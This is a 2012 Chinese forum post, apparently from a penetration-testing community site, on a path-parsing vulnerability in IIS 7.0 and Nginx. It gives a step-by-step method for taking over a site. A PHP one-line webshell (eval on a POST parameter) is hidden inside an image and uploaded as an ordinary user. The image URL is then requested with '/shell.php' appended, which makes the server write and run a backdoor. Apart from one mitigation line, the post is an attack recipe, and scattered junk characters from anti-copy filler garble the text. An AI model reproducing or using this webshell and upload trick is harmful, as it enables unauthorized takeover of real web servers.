中国网络渗透测试联盟

标题: IIS7.0解析漏洞利用 [打印本页]
作者: admin    时间: 2012-9-27 19:40
标题: IIS7.0解析漏洞利用
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 % h8 |* z9 T, z/ `  l
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。% G4 c; s0 ]0 v8 C, N; n
__________________________________
' s% N$ w* ~, b  l! I
0 N# a1 A/ b6 F1 c先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载) 9 R; |2 a2 d8 p$ m$ e2 }( S- ^
先合并一张PHP一句话图片马,合并方法: * r' ~, r  {' L2 w- Q, `( L9 ^
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif ) t4 Y3 z8 z7 c% y# f4 k  z
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>"
$ m4 z5 }2 F& _0 ?& P图片随便找一张. ) \: n+ V) a+ `" A$ P2 T
一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?>
9 C6 K1 b7 N7 F) Y2 v6 Y% u+ R3 {) d然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
4 D* T3 S, \! ~6 r$ M找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 2 P3 ?! `8 X0 C
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg4 F3 |& H% i5 a/ [# s4 m
则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
. x$ O) |5 v8 w1 `# O4 T* m+ _3 `然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php 3 m" U5 ?, s7 O  r  t+ h
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
% U8 r+ w5 d7 ~: ?! N上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
0 N. M( L/ N: t3 ~. J% m找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 1 B0 t2 m  r1 }( b1 c
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
8 D! N2 ?7 d9 w6 x4 \5 ]. S剩下的就随便你去搞吧。
; G& v% r5 h( O1 ]# m! ?9 I- L. F( L' B: I3 W( C' k2 [




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2